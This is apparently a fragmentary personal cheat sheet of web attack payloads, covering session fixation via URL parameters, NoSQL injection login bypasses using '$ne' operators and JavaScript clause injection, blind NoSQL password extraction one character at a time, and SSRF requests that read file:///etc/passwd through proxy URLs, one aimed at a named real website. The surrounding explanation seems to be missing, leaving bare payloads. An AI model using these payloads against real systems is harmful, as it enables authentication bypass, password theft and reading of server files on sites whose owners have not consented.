Session fixation :

    buy.php?id=1&user_id=1
    buy.php?id=1&sid=sessionid12345



   buy.php?id=1&user_id=100 -> victim 


    buy.php?id=1&sid=sessionidhacker


    04.php?sid=gi7n3igj5or71esqgm6qap7vg3


NoSQL:
    SQL 


    NoSQL
    {"username":"ali", "password":"123"}
    {"username":"admin", "password":"321"}
    {"username":"user1", "password":"1","type":"1"}
    {"username":"test", "password":"test"}

    username=admin&password[$ne]=1233333&btn_login=1





admin';})//
admin' || 1==1;})//

{"handle":{"$ne":"reza"},"password":{"$ne":"reza"}}
handle[$ne]=reza&password[$ne]=reza





Blind NoSQL Injection

admin' && this.password=='123';})//

admin' && this.password[0]=='1';})//

admin' && this.password[1]=='2';})//
admin' && this.password.match(/123*/);})//


SSRF 

1 - port scan
2 - if(ip === "192.168.1.1")
3 - read        

http://usafastproxy.info/


http://yahoo.com:25

file:///etc/passwd
http://web.jarvisoj.com:32782/proxy.php?url=File:///opt/lampp/htdocs/admin/index.php


https://www.topik.in/proxy/proxy.php?url=file:///etc/passwd